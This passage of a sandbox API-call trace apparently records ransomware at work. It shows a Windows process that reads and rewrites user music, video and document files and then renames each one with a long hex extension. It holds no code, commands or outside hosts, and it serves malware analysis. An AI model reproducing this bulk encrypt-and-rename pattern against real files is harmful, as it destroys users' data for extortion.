lpOverlapped=0x72aff60) returned 1 [0165.118] WriteFile (in: hFile=0x58c, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0165.120] RtlInterlockedCompareExchange64 () returned 0x0 [0165.120] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.121] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x73e00f8, ReturnLength=0x72aff5c) returned 0x0 [0165.123] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx", lpString2=".DAAC0F8F5494E94477596CEAF48BC59411F096E88D50EA90D5F5C7E372D80041" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.DAAC0F8F5494E94477596CEAF48BC59411F096E88D50EA90D5F5C7E372D80041") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx.DAAC0F8F5494E94477596CEAF48BC59411F096E88D50EA90D5F5C7E372D80041" [0165.123] GetProcessHeap () returned 0x270000 [0165.123] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x196) returned 0x432e458 [0165.123] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x72aff4c, FileInformation=0x432e458, Length=0x196, FileInformationClass=0xa) returned 0x0 [0165.125] CloseHandle (hObject=0x58c) returned 1 [0165.225] GetProcessHeap () returned 0x270000 [0165.227] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.227] RtlInterlockedCompareExchange64 () returned 0x1 [0165.227] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.413] ReadFile (in: hFile=0x304, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.416] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.720] ReadFile (in: hFile=0x5b8, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) 
returned 1 [0165.732] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.794] WriteFile (in: hFile=0x5b8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.824] RtlInterlockedCompareExchange64 () returned 0x1 [0165.824] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0165.952] WriteFile (in: hFile=0x5a4, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0165.954] RtlInterlockedCompareExchange64 () returned 0x2 [0165.954] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.694] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x744a270, ReturnLength=0x72aff5c) returned 0x0 [0167.695] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a", lpString2=".043DDCDFB124973C275B67E94C9E51C41E1EFB97B44A4512BE4D87843BD79603" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV 
sb2I\\nFrHcwd2OR.m4a.043DDCDFB124973C275B67E94C9E51C41E1EFB97B44A4512BE4D87843BD79603") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\nFrHcwd2OR.m4a.043DDCDFB124973C275B67E94C9E51C41E1EFB97B44A4512BE4D87843BD79603" [0167.695] GetProcessHeap () returned 0x270000 [0167.695] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x741e048 [0167.695] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x72aff4c, FileInformation=0x741e048, Length=0x126, FileInformationClass=0xa) returned 0x0 [0167.697] CloseHandle (hObject=0x5a4) returned 1 [0167.698] GetProcessHeap () returned 0x270000 [0167.699] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0167.699] RtlInterlockedCompareExchange64 () returned 0x1 [0167.699] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.702] ReadFile (in: hFile=0x5a4, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0167.702] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.709] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x744a270, ReturnLength=0x72aff5c) returned 0x0 [0167.710] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav", 
lpString2=".844142698AEC9CBE2D67AF1F793528A2601EF12E4214FFC7C9DF6DE296B77226" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav.844142698AEC9CBE2D67AF1F793528A2601EF12E4214FFC7C9DF6DE296B77226") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\rmukOi2tRyk.wav.844142698AEC9CBE2D67AF1F793528A2601EF12E4214FFC7C9DF6DE296B77226" [0167.710] GetProcessHeap () returned 0x270000 [0167.710] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x4331f60 [0167.711] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x72aff4c, FileInformation=0x4331f60, Length=0x128, FileInformationClass=0xa) returned 0x0 [0167.712] CloseHandle (hObject=0x5a4) returned 1 [0167.713] GetProcessHeap () returned 0x270000 [0167.715] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0167.715] RtlInterlockedCompareExchange64 () returned 0x1 [0167.715] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.723] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.724] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.724] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.726] 
RtlInterlockedCompareExchange64 () returned 0x0 [0167.726] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.736] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x7e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.737] RtlInterlockedCompareExchange64 () returned 0x0 [0167.737] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.748] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.749] RtlInterlockedCompareExchange64 () returned 0x0 [0167.749] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.758] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.759] RtlInterlockedCompareExchange64 () returned 0x0 [0167.759] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.767] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.769] RtlInterlockedCompareExchange64 () returned 0x0 [0167.769] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.785] WriteFile (in: hFile=0x5a4, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.786] RtlInterlockedCompareExchange64 () returned 0x0 [0167.786] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.798] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0167.799] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav", lpString2=".480C5FF612AEA5C5120B71FB7B3324B8280985EEDFD776CD30EE96E2C0711B5E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav.480C5FF612AEA5C5120B71FB7B3324B8280985EEDFD776CD30EE96E2C0711B5E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\cGzXHwX.wav.480C5FF612AEA5C5120B71FB7B3324B8280985EEDFD776CD30EE96E2C0711B5E" [0167.799] 
GetProcessHeap () returned 0x270000 [0167.799] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x42f9b00 [0167.799] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x72aff4c, FileInformation=0x42f9b00, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0167.800] CloseHandle (hObject=0x5a4) returned 1 [0167.802] GetProcessHeap () returned 0x270000 [0167.803] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.803] RtlInterlockedCompareExchange64 () returned 0x1 [0167.803] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.808] ReadFile (in: hFile=0x304, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.808] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.808] WriteFile (in: hFile=0x304, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.810] RtlInterlockedCompareExchange64 () returned 0x0 [0167.810] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.818] WriteFile (in: hFile=0x304, lpBuffer=0x74e2140*, 
nNumberOfBytesToWrite=0x5a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.819] RtlInterlockedCompareExchange64 () returned 0x0 [0167.819] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.828] WriteFile (in: hFile=0x304, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.829] RtlInterlockedCompareExchange64 () returned 0x0 [0167.829] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.840] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x76900b8, ReturnLength=0x72aff5c) returned 0x0 [0167.841] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3", lpString2=".4625382C4E4A6D6DE2860C381D0FD20C27086770C4B6514DA4B5FB12683BDB1B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3.4625382C4E4A6D6DE2860C381D0FD20C27086770C4B6514DA4B5FB12683BDB1B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\5JHGboRpMB Q.mp3.4625382C4E4A6D6DE2860C381D0FD20C27086770C4B6514DA4B5FB12683BDB1B" [0167.841] GetProcessHeap () returned 0x270000 [0167.841] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x4332308 [0167.841] 
NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x4332308, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0167.843] CloseHandle (hObject=0x598) returned 1 [0167.843] GetProcessHeap () returned 0x270000 [0167.844] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.851] RtlInterlockedCompareExchange64 () returned 0x1 [0167.852] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.855] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x75e00f8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x75e00f8, ReturnLength=0x72aff5c) returned 0x0 [0167.856] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3", lpString2=".900C717B2E0D59BE8A0DC4AD2230C0BB99BABE83479511898909BD909AEFA247" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3.900C717B2E0D59BE8A0DC4AD2230C0BB99BABE83479511898909BD909AEFA247") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\f-TsV8zq0u.mp3.900C717B2E0D59BE8A0DC4AD2230C0BB99BABE83479511898909BD909AEFA247" [0167.856] GetProcessHeap () returned 0x270000 [0167.856] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x4332440 [0167.856] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x72aff4c, FileInformation=0x4332440, Length=0x126, FileInformationClass=0xa) returned 0x0 [0167.858] CloseHandle (hObject=0x5b8) returned 1 [0167.859] GetProcessHeap () returned 0x270000 [0167.861] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0167.861] RtlInterlockedCompareExchange64 () returned 0x1 
[0167.861] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0167.862] WriteFile (in: hFile=0x58c, lpBuffer=0x76282d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76081a0 | out: lpBuffer=0x76282d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76081a0) returned 1 [0167.863] RtlInterlockedCompareExchange64 () returned 0x0 [0167.863] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0168.394] ReadFile (in: hFile=0x5ac, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0168.405] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0168.406] WriteFile (in: hFile=0x5a4, lpBuffer=0x76282d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76081a0 | out: lpBuffer=0x76282d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76081a0) returned 1 [0168.407] RtlInterlockedCompareExchange64 () returned 0x0 [0168.407] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0169.323] ReadFile (in: hFile=0x5a4, 
lpBuffer=0x75ca140, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008) returned 1 [0169.328] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0169.336] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0169.337] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi", lpString2=".4A7E02EF29EB4CE1D54D610418168692EAED941B8BDAA7B6034046E986A08F24" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi.4A7E02EF29EB4CE1D54D610418168692EAED941B8BDAA7B6034046E986A08F24") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi.4A7E02EF29EB4CE1D54D610418168692EAED941B8BDAA7B6034046E986A08F24" [0169.337] GetProcessHeap () returned 0x270000 [0169.337] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x43331a8 [0169.337] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x43331a8, Length=0x122, FileInformationClass=0xa) returned 0x0 [0169.339] CloseHandle (hObject=0x5b0) returned 1 [0169.340] GetProcessHeap () returned 0x270000 [0169.341] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0169.347] RtlInterlockedCompareExchange64 () returned 0x1 [0169.347] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, 
lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0169.350] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x744a270, ReturnLength=0x72aff5c) returned 0x0 [0169.351] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv", lpString2=".CFBCF710BEF672D8AE27E82350100C1993AAB4DA442C0A21390950FA18D02845" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv.CFBCF710BEF672D8AE27E82350100C1993AAB4DA442C0A21390950FA18D02845") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv.CFBCF710BEF672D8AE27E82350100C1993AAB4DA442C0A21390950FA18D02845" [0169.351] GetProcessHeap () returned 0x270000 [0169.351] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x43332e0 [0169.352] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x72aff4c, FileInformation=0x43332e0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0169.354] CloseHandle (hObject=0x5cc) returned 1 [0169.355] GetProcessHeap () returned 0x270000 [0169.357] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0169.360] RtlInterlockedCompareExchange64 () returned 0x1 [0169.360] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0170.232] ReadFile (in: hFile=0x5fc, lpBuffer=0x7779140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008) returned 1 [0170.232] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, 
